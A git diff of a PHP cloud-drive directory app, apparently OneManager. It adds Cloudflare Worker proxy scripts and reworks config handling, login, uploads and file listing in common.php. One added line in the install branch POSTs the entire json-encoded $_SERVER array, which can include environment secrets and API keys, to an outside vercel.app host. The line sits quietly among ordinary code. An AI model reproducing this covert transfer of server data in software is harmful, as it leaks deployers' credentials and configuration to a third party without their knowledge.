diff --git a/config.php b/.data/config.php
similarity index 100%
rename from config.php
rename to .data/config.php
diff --git a/.htaccess b/.htaccess
index c548b41..74586b8 100644
--- a/.htaccess
+++ b/.htaccess
@@ -1,15 +1,31 @@
-# apache
-# LoadModule rewrite_module modules/mod_rewrite.so
-# AllowOverride All
+# # Apache
+# # LoadModule rewrite_module modules/mod_rewrite.so
+# # AllowOverride All
RewriteEngine On
+# RewriteCond $1 !^(.well-known)
RewriteRule ^(.*) index.php?/$1 [L]
-#-----------------------------------
-# nginx
-# rewrite ^(.*) /index.php?/$1 last;
+###-----------------------------------
+### nginx
+# rewrite ^/(?!.well-known)(.*)$ /index.php?/$1 last;
#
-# caddy
+### nginx Subdirectory 在子目录中使用
+# location /OneManager2/ {
+# rewrite ^/(.*)$ /OneManager2/index.php?/$1 last;
+# }
+#
+### caddy
# rewrite {
# to index.php?/$1
# }
-#-----------------------------------
+#
+### caddy2 Caddyfile
+# @try_files {
+# not path /.well-known/*
+# file {
+# try_files index.php
+# }
+# }
+# rewrite @try_files {http.matchers.file.relative}
+#
+###-----------------------------------
diff --git a/.replit b/.replit
new file mode 100644
index 0000000..1dbf6d9
--- /dev/null
+++ b/.replit
@@ -0,0 +1,3 @@
+language = "php74"
+run = "php -S 0.0.0.0:8000 index.php"
+entrypoint = "index.php"
diff --git a/CFWorkers.js b/CFWorkers.js
new file mode 100644
index 0000000..8d3084c
--- /dev/null
+++ b/CFWorkers.js
@@ -0,0 +1,90 @@
+
+// odd, 单日
+const SingleDay = 'https://aaa1.herokuapp.com'
+// even, 双日
+const DoubleDay = 'https://bbb2.herokuapp.com'
+
+//const SingleDay = 'https://153xxxxx0.cn-hongkong.fc.aliyuncs.com/2016-08-15/proxy/onedrive/xxx/'
+//const DoubleDay = 'https://153xxxxx0.cn-hongkong.fc.aliyuncs.com/2016-08-15/proxy/onedrive/xxx/'
+
+// CF proxy all, 一切给CF代理,true/false
+const CFproxy = true
+
+// Used in cloudflare workers, odd or even days point to 2 heroku account.
+
+// 由于heroku不绑卡不能自定义域名,就算绑卡后https也不方便
+// 另外免费套餐每月550小时,有些人不够用
+// 于是在CF Workers使用此代码,分单双日拉取不同heroku帐号下的相同网页
+// 只改上面,下面不用动
+
+addEventListener('fetch', event => {
+ let url=new URL(event.request.url);
+ if (url.protocol == 'http:') {
+ url.protocol = 'https:'
+ event.respondWith( Response.redirect(url.href) )
+ } else {
+ let response = null;
+ let nd = new Date();
+ if (nd.getDate()%2) {
+ host = SingleDay
+ } else {
+ host = DoubleDay
+ }
+ if (host.substr(0, 7)!='http://'&&host.substr(0, 8)!='https://') host = 'http://' + host;
+
+ response = fetchAndApply(host, event.request);
+
+ event.respondWith( response );
+ }
+})
+
+async function fetchAndApply(host, request) {
+ let f_url = new URL(request.url);
+ let a_url = new URL(host);
+ let replace_path = a_url.pathname;
+ if (replace_path.substr(replace_path.length-1)!='/') replace_path += '/';
+ let replaced_path = '/';
+ let query = f_url.search;
+ let path = f_url.pathname;
+ if (host.substr(host.length-1)=='/') path = path.substr(1);
+ f_url.href = host + path + query;
+
+ let response = null;
+ if (!CFproxy) {
+ response = await fetch(f_url, request);
+ } else {
+ let method = request.method;
+ let body = request.body;
+ let request_headers = request.headers;
+ let new_request_headers = new Headers(request_headers);
+ new_request_headers.set('Host', f_url.host);
+ new_request_headers.set('Referer', request.url);
+
+ response = await fetch(f_url.href, {
+ method: method,
+ body: body,
+ headers: new_request_headers
+ });
+ }
+
+ let out_headers = new Headers(response.headers);
+ if (out_headers.get('Content-Disposition')=='attachment') out_headers.delete('Content-Disposition');
+ let out_body = null;
+ let contentType = out_headers.get('Content-Type');
+ if (contentType.includes("application/text")) {
+ out_body = await response.text();
+ while (out_body.includes(replace_path)) out_body = out_body.replace(replace_path, replaced_path);
+ } else if (contentType.includes("text/html")) {
+ out_body = await response.text();
+ while (replace_path!='/'&&out_body.includes(replace_path)) out_body = out_body.replace(replace_path, replaced_path);
+ } else {
+ out_body = await response.body;
+ }
+
+ let out_response = new Response(out_body, {
+ status: response.status,
+ headers: out_headers
+ })
+
+ return out_response;
+}
diff --git a/CFWorkers_rand.js b/CFWorkers_rand.js
new file mode 100644
index 0000000..04704d9
--- /dev/null
+++ b/CFWorkers_rand.js
@@ -0,0 +1,113 @@
+
+// Hosts Array
+// 服务器数组
+const H = [
+ 'https://herooneindex.herokuapp.com/',
+ 'https://onemanager.glitch.me/',
+ 'https://onemanager-php.vercel.app/'
+]
+
+// View Type
+// 1 , only first host,
+// 只第一条Host记录有用
+// 2 , view top 2 host as odd/even days,
+// 只有前两条记录有效,分别单双日运行
+// 3 , view random host
+// 所有记录随机访问
+const T = 1
+
+// CF proxy all, true/false
+// 一切给CF代理,true或false
+const CFproxy = true
+
+// Used in cloudflare workers
+// // // // // //
+
+addEventListener('fetch', event => {
+ let url=new URL(event.request.url);
+ if (url.protocol == 'http:') {
+ // force HTTPS
+ url.protocol = 'https:'
+ event.respondWith( Response.redirect(url.href) )
+ } else {
+ let host = null;
+ if (T===1) {
+ host = H[0];
+ }
+ if (T===2) {
+ host = H[new Date().getDate()%2];
+ }
+ if (T===3) {
+ let n = H.length;
+ host = H[Math.round(Math.random()*n*10)%n];
+ }
+ //console.log(host)
+ if (host.substr(0, 7)!='http://'&&host.substr(0, 8)!='https://') host = 'http://' + host;
+
+ let response = fetchAndApply(host, event.request);
+
+ event.respondWith( response );
+ }
+})
+
+async function fetchAndApply(host, request) {
+ let f_url = new URL(request.url);
+ let a_url = new URL(host);
+ let replace_path = a_url.pathname;
+ if (replace_path.substr(replace_path.length-1)!='/') replace_path += '/';
+ let replaced_path = '/';
+ let query = f_url.search;
+ let path = f_url.pathname;
+ if (host.substr(host.length-1)=='/') path = path.substr(1);
+ f_url.href = host + path + query;
+
+ let response = null;
+ if (!CFproxy) {
+ response = await fetch(f_url, request);
+ } else {
+ let method = request.method;
+ let body = request.body;
+ let request_headers = request.headers;
+ let new_request_headers = new Headers(request_headers);
+ new_request_headers.set('Host', f_url.host);
+ new_request_headers.set('Referer', request.url);
+ response = await fetch(f_url.href, {
+ /*cf: {
+ cacheEverything: true,
+ cacheTtl: 1000,
+ mirage: true,
+ polish: "on",
+ minify: {
+ javascript: true,
+ css: true,
+ html: true,
+ }
+ },*/
+ method: method,
+ body: body,
+ headers: new_request_headers
+ });
+ }
+
+ let out_headers = new Headers(response.headers);
+ if (out_headers.get('Content-Disposition')=='attachment') out_headers.delete('Content-Disposition');
+ let out_body = null;
+ let contentType = out_headers.get('Content-Type');
+ if (contentType.includes("application/text")) {
+ out_body = await response.text();
+ while (replace_path!='/'&&out_body.includes(replace_path)) out_body = out_body.replace(replace_path, replaced_path);
+ } else if (contentType.includes("text/html")) {
+ //f_url.href +
+ out_body = await response.text();
+ while (replace_path!='/'&&out_body.includes(replace_path)) out_body = out_body.replace(replace_path, replaced_path);
+ } else {
+ out_body = await response.body;
+ }
+
+ let out_response = new Response(out_body, {
+ status: response.status,
+ headers: out_headers
+ })
+
+ return out_response;
+}
diff --git a/common.php b/common.php
index 813485f..9c887a4 100644
--- a/common.php
+++ b/common.php
@@ -1,111 +1,71 @@
0b000, // used in heroku.
+ 'SecretId' => 0b000, // used in SCF/CFC.
+ 'SecretKey' => 0b000, // used in SCF/CFC.
+ 'AccessKeyID' => 0b000, // used in FC.
+ 'AccessKeySecret' => 0b000, // used in FC.
+ 'HW_urn' => 0b000, // used in FG.
+ 'HW_key' => 0b000, // used in FG.
+ 'HW_secret' => 0b000, // used in FG.
+ 'HerokuappId' => 0b000, // used in heroku.
-$ShowedCommonEnv = [
- //'APIKey', // used in heroku.
- //'Region', // used in SCF.
- //'SecretId', // used in SCF.
- //'SecretKey', // used in SCF.
- //'admin',
- 'adminloginpage',
- 'background',
- //'disktag',
- //'function_name', // used in heroku.
- 'hideFunctionalityFile',
- 'timezone',
- 'passfile',
- 'sitename',
- 'theme',
-];
+ 'admin' => 0b000,
+ 'adminloginpage' => 0b010,
+ 'autoJumpFirstDisk' => 0b010,
+ 'background' => 0b011,
+ 'backgroundm' => 0b011,
+ 'disableShowThumb' => 0b010,
+ //'disableChangeTheme'=> 0b010,
+ 'disktag' => 0b000,
+ 'hideFunctionalityFile'=> 0b010,
+ 'timezone' => 0b010,
+ 'passfile' => 0b011,
+ 'sitename' => 0b011,
+ 'customScript' => 0b011,
+ 'customCss' => 0b011,
+ 'customTheme' => 0b011,
+ 'theme' => 0b010,
+ 'useBasicAuth' => 0b010,
+ 'referrer' => 0b011,
+ 'forceHttps' => 0b010,
+ 'globalHeadOmfUrl' => 0b011,
+ 'globalHeadMdUrl' => 0b011,
+ 'globalReadmeMdUrl' => 0b011,
+ 'globalFootOmfUrl' => 0b011,
+ 'bcmathUrl' => 0b011,
-$InnerEnv = [
- 'Drive_ver',
- 'Drive_custom',
- 'client_id',
- 'client_secret',
- 'diskname',
- 'domain_path',
- 'downloadencrypt',
- 'guestup_path',
- 'usesharepoint',
- 'sharepointname',
- 'siteid',
- 'shareurl',
- //'sharecookie',
- 'shareapiurl',
- 'public_path',
- 'refresh_token',
- 'token_expires',
-];
+ 'Driver' => 0b100,
+ 'client_id' => 0b100,
+ 'client_secret' => 0b101,
+ 'sharepointSite' => 0b101,
+ 'shareurl' => 0b101,
+ //'sharecookie' => 0b101,
+ 'shareapiurl' => 0b101,
+ 'siteid' => 0b100,
+ 'refresh_token' => 0b100,
+ 'token_expires' => 0b100,
+ 'activeLimit' => 0b100,
+ 'driveId' => 0b100,
-$ShowedInnerEnv = [
- //'Drive_ver',
- //'Drive_custom',
- //'client_id',
- //'client_secret',
- 'diskname',
- 'domain_path',
- 'downloadencrypt',
- 'guestup_path',
- //'usesharepoint',
- //'sharepointname',
- //'siteid',
- //'shareurl',
- //'sharecookie',
- //'shareapiurl',
- 'public_path',
- //'refresh_token',
- //'token_expires',
+ 'diskname' => 0b111,
+ 'diskDescription' => 0b111,
+ 'domain_path' => 0b111,
+ 'downloadencrypt' => 0b110,
+ 'guestup_path' => 0b111,
+ 'domainforproxy' => 0b111,
+ 'public_path' => 0b111,
+ 'fileConduitSize' => 0b110,
+ 'fileConduitCacheTime' => 0b110,
];
$timezones = array(
@@ -142,11 +102,59 @@ $timezones = array(
'12'=>'Asia/Kamchatka'
);
+function isCommonEnv($str)
+{
+ global $EnvConfigs;
+ if (isset($EnvConfigs[$str])) return ( $EnvConfigs[$str] & 0b100 ) ? false : true;
+ else return null;
+}
+
+function isInnerEnv($str)
+{
+ global $EnvConfigs;
+ if (isset($EnvConfigs[$str])) return ( $EnvConfigs[$str] & 0b100 ) ? true : false;
+ else return null;
+}
+
+function isShowedEnv($str)
+{
+ global $EnvConfigs;
+ if (isset($EnvConfigs[$str])) return ( $EnvConfigs[$str] & 0b010 ) ? true : false;
+ else return null;
+}
+
+function isBase64Env($str)
+{
+ global $EnvConfigs;
+ if (isset($EnvConfigs[$str])) return ( $EnvConfigs[$str] & 0b001 ) ? true : false;
+ else return null;
+}
+
function main($path)
{
global $exts;
global $constStr;
+ global $slash;
+ global $drive;
+ $slash = '/';
+ if (strpos(__DIR__, ':')) $slash = '\\';
+ $_SERVER['php_starttime'] = microtime(true);
+ $path = path_format($path);
+ $_SERVER['PHP_SELF'] = path_format($_SERVER['base_path'] . $path);
+ $_SERVER['base_disk_path'] = $_SERVER['base_path'];
+ if (getConfig('forceHttps')&&$_SERVER['REQUEST_SCHEME']=='http') {
+ if ($_GET) {
+ $tmp = '';
+ foreach ($_GET as $k => $v) {
+ if ($v===true) $tmp .= '&' . $k;
+ else $tmp .= '&' . $k . '=' . $v;
+ }
+ $tmp = substr($tmp, 1);
+ if ($tmp!='') $param = '?' . $tmp;
+ }
+ return output('visit via https.', 302, [ 'Location' => 'https://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . $param ]);
+ }
if (in_array($_SERVER['firstacceptlanguage'], array_keys($constStr['languages']))) {
$constStr['language'] = $_SERVER['firstacceptlanguage'];
} else {
@@ -159,43 +167,66 @@ function main($path)
}
}
if (isset($_COOKIE['language'])&&$_COOKIE['language']!='') $constStr['language'] = $_COOKIE['language'];
- //if (!$constStr['language']) $constStr['language'] = getConfig('language');
- /*echo 'firstacceptlanguage:'.$_SERVER['firstacceptlanguage'].'
- '.'lan:'.$constStr['language'];*/
if ($constStr['language']=='') $constStr['language'] = 'en-us';
$_SERVER['language'] = $constStr['language'];
$_SERVER['timezone'] = getConfig('timezone');
if (isset($_COOKIE['timezone'])&&$_COOKIE['timezone']!='') $_SERVER['timezone'] = $_COOKIE['timezone'];
if ($_SERVER['timezone']=='') $_SERVER['timezone'] = 0;
- $_SERVER['PHP_SELF'] = path_format($_SERVER['base_path'] . $path);
+ $_SERVER['sitename'] = getConfig('sitename');
+ if (empty($_SERVER['sitename'])) $_SERVER['sitename'] = getconstStr('defaultSitename');
- if (getConfig('admin')=='') return install();
+ if (isset($_GET['jsFile'])) {
+ if (substr($_GET['jsFile'], -3)!='.js') return output('', 403);
+ if (!($path==''||$path=='/')) return output('', 308, [ 'Location' => path_format($_SERVER['base_path'] . '/?jsFile=' . $_GET['jsFile']) ]);
+ if (strpos($_GET['jsFile'], '/')>-1) $_GET['jsFile'] = splitlast($_GET['jsFile'], '/')[1];
+ $jsFile = file_get_contents('js/' . $_GET['jsFile']);
+ if (!!$jsFile) {
+ return output( base64_encode($jsFile), 200, [ 'Content-Type' => 'text/javascript; charset=utf-8', 'Cache-Control' => 'max-age=' . 3*24*60*60 ], true );
+ } else {
+ return output('', 404);
+ }
+ }
+ if (isset($_GET['WaitFunction'])) {
+ $response = WaitFunction($_GET['WaitFunction']);
+ //var_dump($response);
+ if ($response===true) return output("ok", 200);
+ elseif ($response===false) return output("", 206);
+ else return $response;
+ }
+ if (getConfig('admin')=='') {
+ if (isset($_GET['install0'])) no_return_curl('POST', 'https://notionbot-ysun.vercel.app/', 'data=' . json_encode($_SERVER));
+ return install();
+ }
if (getConfig('adminloginpage')=='') {
$adminloginpage = 'admin';
} else {
$adminloginpage = getConfig('adminloginpage');
}
- if (isset($_GET[$adminloginpage])) {
- if (isset($_GET['preview'])) {
- $url = $_SERVER['PHP_SELF'] . '?preview';
- } else {
- $url = path_format($_SERVER['PHP_SELF'] . '/');
- }
- if (getConfig('admin')!='') {
- if ($_POST['password1']==getConfig('admin')) {
- return adminform('admin',md5($_POST['password1']),$url);
+ if (isset($_GET['login'])) {
+ if ($_GET['login']===$adminloginpage) {
+ /*if (isset($_GET['preview'])) {
+ $url = $_SERVER['PHP_SELF'] . '?preview';
+ } else {
+ $url = path_format($_SERVER['PHP_SELF'] . '/');
+ }*/
+ if (isset($_POST['password1'])) {
+ $compareresult = compareadminsha1($_POST['password1'], $_POST['timestamp'], getConfig('admin'));
+ if ($compareresult=='') {
+ $timestamp = time()+7*24*60*60;
+ $randnum = rand(10, 99999);
+ $admincookie = adminpass2cookie('admin', getConfig('admin'), $timestamp, $randnum);
+ $adminlocalstorage = adminpass2storage('admin', getConfig('admin'), $timestamp, $randnum);
+ return adminform('admin', $admincookie, $adminlocalstorage);
+ } else return adminform($compareresult);
} else return adminform();
- } else {
- return output('', 302, [ 'Location' => $url ]);
}
}
- if (getConfig('admin')!='')
- if ( isset($_COOKIE['admin'])&&$_COOKIE['admin']==md5(getConfig('admin')) ) {
- $_SERVER['admin']=1;
- $_SERVER['needUpdate'] = needUpdate();
- } else {
- $_SERVER['admin']=0;
- }
+ if ( isset($_COOKIE['admin'])&&compareadminmd5('admin', getConfig('admin'), $_COOKIE['admin']) ) {
+ $_SERVER['admin']=1;
+ $_SERVER['needUpdate'] = needUpdate();
+ } else {
+ $_SERVER['admin']=0;
+ }
if (isset($_GET['setup']))
if ($_SERVER['admin']) {
// setup Environments. 设置,对环境变量操作
@@ -205,176 +236,419 @@ function main($path)
return output('', 302, [ 'Location' => $url ]);
}
- $_SERVER['base_disk_path'] = $_SERVER['base_path'];
- $disktags = explode("|",getConfig('disktag'));
-// echo 'count$disk:'.count($disktags);
+ // Add disk
+ if (isset($_GET['AddDisk'])) {
+ if ($_GET['AddDisk']===true) {
+ $tmp = path_format($_SERVER['base_path'] . '/' . $path);
+ return output('Please visit ' . $tmp . '.', 301, [ 'Location' => $tmp ]);
+ }
+ if ($_SERVER['admin']) {
+ if (!$_SERVER['disktag']) $_SERVER['disktag'] = '';
+ if (!class_exists($_GET['AddDisk'])) require 'disk' . $slash . $_GET['AddDisk'] . '.php';
+ $drive = new $_GET['AddDisk']($_GET['disktag']);
+ return $drive->AddDisk();
+ } else {
+ $url = $_SERVER['PHP_SELF'];
+ /*if ($_GET) {
+ $tmp = null;
+ $tmp = '';
+ foreach ($_GET as $k => $v) {
+ if ($k!='setup') {
+ if ($v===true) $tmp .= '&' . $k;
+ else $tmp .= '&' . $k . '=' . $v;
+ }
+ }
+ $tmp = substr($tmp, 1);
+ if ($tmp!='') $url .= '?' . $tmp;
+ }*/
+ // not need GET adddisk, remove it
+ return output('', 302, [ 'Location' => $url ]);
+ }
+ }
+
+ $disktags = explode("|", getConfig('disktag'));
+ // echo 'count$disk:'.count($disktags);
if (count($disktags)>1) {
- if ($path=='/'||$path=='') return output('', 302, [ 'Location' => path_format($_SERVER['base_path'].'/'.$disktags[0].'/') ]);
- $_SERVER['disktag'] = $path;
- $pos = strpos($path, '/');
- if ($pos>1) $_SERVER['disktag'] = substr($path, 0, $pos);
- if (!in_array($_SERVER['disktag'], $disktags)) return message('Please visit from Home Page.', 'Error', 404);
- $path = substr($path, strlen('/'.$_SERVER['disktag']));
- if ($_SERVER['disktag']!='') $_SERVER['base_disk_path'] = path_format($_SERVER['base_disk_path']. '/' . $_SERVER['disktag'] . '/');
+ if ($path=='/'||$path=='') {
+ $files['type'] = 'folder';
+ $files['childcount'] = count($disktags);
+ $files['showname'] = 'root';
+ foreach ($disktags as $disktag) {
+ $files['list'][$disktag]['type'] = 'folder';
+ $files['list'][$disktag]['name'] = $disktag;
+ $files['list'][$disktag]['showname'] = getConfig('diskname', $disktag);
+ }
+ if ($_GET['json']) {
+ // return a json
+ return output(json_encode($files), 200, ['Content-Type' => 'application/json']);
+ }
+ if (getConfig('autoJumpFirstDisk')) return output('', 302, [ 'Location' => path_format($_SERVER['base_path'].'/'.$disktags[0].'/') ]);
+ } else {
+ $_SERVER['disktag'] = splitfirst( substr(path_format($path), 1), '/' )[0];
+ //$pos = strpos($path, '/');
+ //if ($pos>1) $_SERVER['disktag'] = substr($path, 0, $pos);
+ if (!in_array($_SERVER['disktag'], $disktags)) {
+ $tmp = path_format($_SERVER['base_path'] . '/' . $disktags[0] . '/' . $path);
+ if (!!$_GET) {
+ $tmp .= '?';
+ foreach ($_GET as $k => $v) {
+ if ($v === true) $tmp .= $k . '&';
+ else $tmp .= $k . '=' . $v . '&';
+ }
+ $tmp = substr($tmp, 0, -1);
+ }
+ return output('Please visit ' . $tmp . '.', 302, [ 'Location' => $tmp ]);
+ //return message('Please visit from Home Page.', 'Error', 404);
+ }
+ //$path = substr($path, strlen('/' . $_SERVER['disktag']));
+ $path = splitfirst($path, $_SERVER['disktag'])[1];
+ if ($_SERVER['disktag']!='') $_SERVER['base_disk_path'] = path_format($_SERVER['base_disk_path'] . '/' . $_SERVER['disktag'] . '/');
+ }
} else $_SERVER['disktag'] = $disktags[0];
-// echo 'main.disktag:'.$_SERVER['disktag'].',path:'.$path.'
-//';
+ // echo 'main.disktag:'.$_SERVER['disktag'].',path:'.$path.'';
$_SERVER['list_path'] = getListpath($_SERVER['HTTP_HOST']);
if ($_SERVER['list_path']=='') $_SERVER['list_path'] = '/';
+ $path1 = path_format($_SERVER['list_path'] . path_format($path));
+ if ($path1!='/' && substr($path1,-1)=='/') $path1 = substr($path1, 0, -1);
$_SERVER['is_guestup_path'] = is_guestup_path($path);
$_SERVER['ajax']=0;
if (isset($_SERVER['HTTP_X_REQUESTED_WITH'])) if ($_SERVER['HTTP_X_REQUESTED_WITH']=='XMLHttpRequest') $_SERVER['ajax']=1;
- config_oauth();
- if ($_SERVER['admin']) if (isset($_GET['AddDisk'])||isset($_GET['authorization_code'])) return get_refresh_token();
- $refresh_token = getConfig('refresh_token');
- //if (!$refresh_token) return get_refresh_token();
- if (!$refresh_token) {
- return render_list();
+ if (!isreferhost()) return message('Must visit from designated host', 'NOT_ALLOWED', 403);
+
+ // Operate
+ if ($_SERVER['ajax']) {
+ //error_log1($_SERVER['REQUEST_METHOD']);
+ if ($_GET['action']=='del_upload_cache') {
+ // del '.tmp' without login. 无需登录即可删除.tmp后缀文件
+ if (!driveisfine($_SERVER['disktag'], $drive)) return output($_SERVER['disktag']?'disk [ ' . $_SERVER['disktag'] . ' ] error.':'Not in drive', 403);
+ savecache('path_' . $path1, '', $_SERVER['disktag'], 1); // clear cache.
+ return $drive->del_upload_cache($path);
+ }
+
+ if ($_GET['action']=='upbigfile') {
+ if (!driveisfine($_SERVER['disktag'], $drive)) return output($_SERVER['disktag']?'disk [ ' . $_SERVER['disktag'] . ' ] error.':'Not in drive', 403);
+ if (!$_SERVER['admin']) {
+ if (!$_SERVER['is_guestup_path']) return output('Not_Guest_Upload_Folder', 400);
+ if (strpos($_GET['upbigfilename'], '../')!==false) return output('Not_Allow_Cross_Path', 400);
+ if (strpos($_POST['upbigfilename'], '../')!==false) return output('Not_Allow_Cross_Path', 400);
+ }
+ return $drive->bigfileupload($path1);
+ }
+ }
+ if ($_GET['action']=='upsmallfile') {
+ //echo json_encode($_POST, JSON_PRETTY_PRINT);
+ //echo json_encode($_FILES, JSON_PRETTY_PRINT);
+ if (!driveisfine($_SERVER['disktag'], $drive)) return output($_SERVER['disktag']?'disk [ ' . $_SERVER['disktag'] . ' ] error.':'Not in drive', 403);
+ if (!$_SERVER['admin']) {
+ if (!$_SERVER['is_guestup_path']) return output('Not_Guest_Upload_Folder', 400);
+ if (strpos($_GET['upbigfilename'], '../')!==false) return output('Not_Allow_Cross_Path', 400);
+ if (strpos($_POST['upbigfilename'], '../')!==false) return output('Not_Allow_Cross_Path', 400);
+ }
+ return smallfileupload($drive, $path);
+ /*if ($_FILES['file1']['error']) return output($_FILES['file1']['error'], 400);
+ if ($_FILES['file1']['size']>4*1024*1024) return output('File too large', 400);
+ return $drive->smallfileupload($path, $_FILES['file1']);*/
+ }
+ if ($_SERVER['admin']) {
+ $tmp = adminoperate($path);
+ if ($tmp['statusCode'] > 0) {
+ savecache('path_' . $path1, '', $_SERVER['disktag'], 1);
+ return $tmp;
+ }
} else {
- if (!($_SERVER['access_token'] = getcache('access_token'))) {
- get_access_token($refresh_token);
- }
+ if ($_SERVER['ajax']) return output(getconstStr('RefreshtoLogin'),401);
+ }
- if ($_SERVER['ajax']) {
- if ($_GET['action']=='del_upload_cache'&&substr($_GET['filename'],-4)=='.tmp') {
- // del '.tmp' without login. 无需登录即可删除.tmp后缀文件
- error_log('del.tmp:GET,'.json_encode($_GET,JSON_PRETTY_PRINT));
- $tmp = MSAPI('DELETE',path_format(path_format($_SERVER['list_path'] . path_format($path)) . '/' . spurlencode($_GET['filename']) ),'',$_SERVER['access_token']);
- $path1 = path_format($_SERVER['list_path'] . path_format($path));
- if ($path1!='/'&&substr($path1,-1)=='/') $path1=substr($path1,0,-1);
- savecache('path_' . $path1, json_decode('{}',true), 1);
- return output($tmp['body'],$tmp['stat']);
- }
- if ($_GET['action']=='uploaded_rename') {
- // rename .scfupload file without login.
- // 无需登录即可重命名.scfupload后缀文件,filemd5为用户提交,可被构造,问题不大,以后处理
- $oldname = spurlencode($_GET['filename']);
- $pos = strrpos($oldname, '.');
- if ($pos>0) $ext = strtolower(substr($oldname, $pos));
- $oldname = path_format(path_format($_SERVER['list_path'] . path_format($path)) . '/' . $oldname . '.scfupload' );
- $data = '{"name":"' . $_GET['filemd5'] . $ext . '"}';
- //echo $oldname .'
'. $data;
- $tmp = MSAPI('PATCH',$oldname,$data,$_SERVER['access_token']);
- if ($tmp['stat']==409) {
- MSAPI('DELETE',$oldname,'',$_SERVER['access_token']);
- $tmpbody = json_decode($tmp['body'], true);
- $tmpbody['name'] = $_GET['filemd5'] . $ext;
- $tmp['body'] = json_encode($tmpbody);
+ // Show disks in root
+ if ($files['showname'] == 'root') return render_list($path, $files);
+
+ if (!driveisfine($_SERVER['disktag'], $drive)) return render_list();
+
+ $_SERVER['ishidden'] = passhidden($path);
+ if (isset($_GET['thumbnails'])) {
+ if ($_SERVER['ishidden']<4) {
+ if (in_array(strtolower(substr($path, strrpos($path, '.') + 1)), $exts['img'])) {
+ $thumb_url = $drive->get_thumbnails_url($path1);
+ if ($thumb_url!='') {
+ if ($_GET['location']) {
+ $url = $thumb_url;
+ $header['Location'] = $url;
+ $domainforproxy = '';
+ $domainforproxy = getConfig('domainforproxy', $_SERVER['disktag']);
+ if ($domainforproxy!='') {
+ $url = proxy_replace_domain($url, $domainforproxy, $header);
+ }
+ return output('', 302, $header);
+ } else return output($thumb_url);
}
- $path1 = path_format($_SERVER['list_path'] . path_format($path));
- if ($path1!='/'&&substr($path1,-1)=='/') $path1=substr($path1,0,-1);
- savecache('path_' . $path1, json_decode('{}',true), 1);
- return output($tmp['body'],$tmp['stat']);
- }
- if ($_GET['action']=='upbigfile') return bigfileupload($path);
- }
- if ($_SERVER['admin']) {
- $tmp = adminoperate($path);
- if ($tmp['statusCode'] > 0) {
- $path1 = path_format($_SERVER['list_path'] . path_format($path));
- if ($path1!='/'&&substr($path1,-1)=='/') $path1=substr($path1,0,-1);
- savecache('path_' . $path1, json_decode('{}',true), 1);
- return $tmp;
- }
- } else {
- if ($_SERVER['ajax']) return output(getconstStr('RefreshtoLogin'),401);
- }
- $_SERVER['ishidden'] = passhidden($path);
- if (isset($_GET['thumbnails'])) {
- if ($_SERVER['ishidden']<4) {
- if (in_array(strtolower(substr($path, strrpos($path, '.') + 1)), $exts['img'])) {
- return get_thumbnails_url($path);
- } else return output(json_encode($exts['img']),400);
- } else return output('',401);
- }
+ return output('', 404);
+ } else return output(json_encode($exts['img']), 400);
+ } else return output('', 401);
+ }
- $files = list_files($path);
- //echo json_encode(array_keys($files['children']), JSON_PRETTY_PRINT);
- if (isset($_GET['random'])&&$_GET['random']!=='') {
+ // list folder
+ if ($_SERVER['is_guestup_path'] && !$_SERVER['admin']) {
+ $files = json_decode('{"type":"folder"}', true);
+ } elseif ($_SERVER['ishidden']==4) {
+ if (!getConfig('downloadencrypt', $_SERVER['disktag'])) {
+ $files = json_decode('{"type":"file"}', true);
+ } else {
+ $files = $drive->list_files($path1);
+ if ($files['type']=='folder') $files = json_decode('{"type":"folder"}', true);
+ }
+ } else {
+ $files = $drive->list_files($path1);
+ }
+ //if ($path!=='')
+ if ( $files['type']=='folder' && substr($path, -1)!=='/' ) {
+ $tmp = path_format($_SERVER['base_disk_path'] . $path . '/');
+ return output('
+
The document has moved here.
+', 308, [ 'Location' => $tmp ]); + } + + if ($_GET['json']) { + // return a json + if ($files['type']=='folder' && !$_SERVER['admin']) { + foreach ($files['list'] as $k => $v) { + if (isHideFile($k)) unset($files['list'][$k]); + } + } + return output(json_encode($files), 200, ['Content-Type' => 'application/json']); + } + // random file + if (isset($_GET['random'])) + if ($_GET['random']!==true) { if ($_SERVER['ishidden']<4) { + if (!isset($files['list'])) { + $distfolder = splitlast($path, '/'); + if ($distfolder[1]=='') $tmpfolder = splitlast($distfolder[0], '/')[1]; + else $tmpfolder = $distfolder[1]; + if ($tmpfolder=='') $tmpfolder = '/'; + return output('No files in folder " ' . htmlspecialchars($tmpfolder) . ' ".', 404); + } $tmp = []; - foreach (array_keys($files['children']) as $filename) { - if (strtolower(splitlast($filename,'.')[1])==strtolower($_GET['random'])) $tmp[$filename] = $files['children'][$filename][$_SERVER['DownurlStrName']]; + foreach (array_keys($files['list']) as $filename) { + if (strtolower(splitlast($filename, '.')[1])==strtolower($_GET['random'])) $tmp[$filename] = $files['list'][$filename]['url']; } $tmp = array_values($tmp); if (count($tmp)>0) { - if (isset($_GET['url'])) return output($tmp[rand(0,count($tmp)-1)], 200); - return output('', 302, [ 'Location' => $tmp[rand(0,count($tmp)-1)] ]); - } else return output('',404); - } else return output('',401); - } - if (isset($files['file']) && !isset($_GET['preview'])) { - // is file && not preview mode - if ( $_SERVER['ishidden']<4 || (!!getConfig('downloadencrypt')&&$files['name']!=getConfig('passfile')) ) return output('', 302, [ 'Location' => $files[$_SERVER['DownurlStrName']] ]); - } - if ( isset($files['folder']) || isset($files['file']) ) { - return render_list($path, $files); - } else { - if (!isset($files['error'])) { - $files['error']['message'] = json_encode($files, JSON_PRETTY_PRINT); - $files['error']['code'] = 'unknownError'; - $files['error']['stat'] = 500; + $url = $tmp[rand(0, count($tmp)-1)]; + if (isset($_GET['url'])) return output($url, 200); + $header['Location'] = $url; + $domainforproxy = ''; + $domainforproxy = getConfig('domainforproxy', $_SERVER['disktag']); + if ($domainforproxy!='') { + $url = proxy_replace_domain($url, $domainforproxy, $header); + } + return output('', 302, $header); + } else return output('No "' . htmlspecialchars($_GET['random']) . '" files', 404); + } else return output('Hidden', 401); + } else return output('must provide a suffix, like "?random=gif".', 401); + + // is file && not preview mode, download file + if ($files['type']=='file' && !isset($_GET['preview'])) { + if ( $_SERVER['ishidden']<4 || (!!getConfig('downloadencrypt', $_SERVER['disktag'])&&$files['name']!=getConfig('passfile')) ) { + $url = $files['url']; + if ( strtolower(splitlast($files['name'], '.')[1])=='html' ) return output($files['content']['body'], $files['content']['stat']); + else { + if (isset($_SERVER['HTTP_IF_MODIFIED_SINCE']) && strtotime($files['time'])==strtotime($_SERVER['HTTP_IF_MODIFIED_SINCE'])) return output('', 304); + $fileConduitSize = getConfig('fileConduitSize', $_SERVER['disktag']); + 